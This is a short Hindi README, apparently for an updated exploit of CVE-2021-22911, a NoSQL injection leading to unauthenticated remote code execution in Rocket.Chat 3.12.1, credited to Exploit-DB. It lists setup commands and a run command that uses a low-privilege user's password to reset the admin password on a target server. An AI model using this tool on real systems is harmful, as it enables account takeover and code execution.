
CVE-2021-22911 के लिए अद्यतन एक्सप्लॉइट (Rocket.Chat 3.12.1 - NoSQL इंजेक्शन से RCE (बिना प्रमाणीकरण))
मूल श्रेय : https://www.exploit-db.com/exploits/50108
$ python -m venv venv
$ source venv/bin/activate
$ pip install requests oathtool
-p जोड़ा है जो निम्न विशेषाधिकार वाले उपयोगकर्ता का पासवर्ड लेता है और एडमिन पासवर्ड रीसेट करने के लिए भी इसी का उपयोग करता है$ python 50108.py -u "[email protected]" -p "<low priv user password>" -a "admin@localhost" -t "http://<ip>:<port>"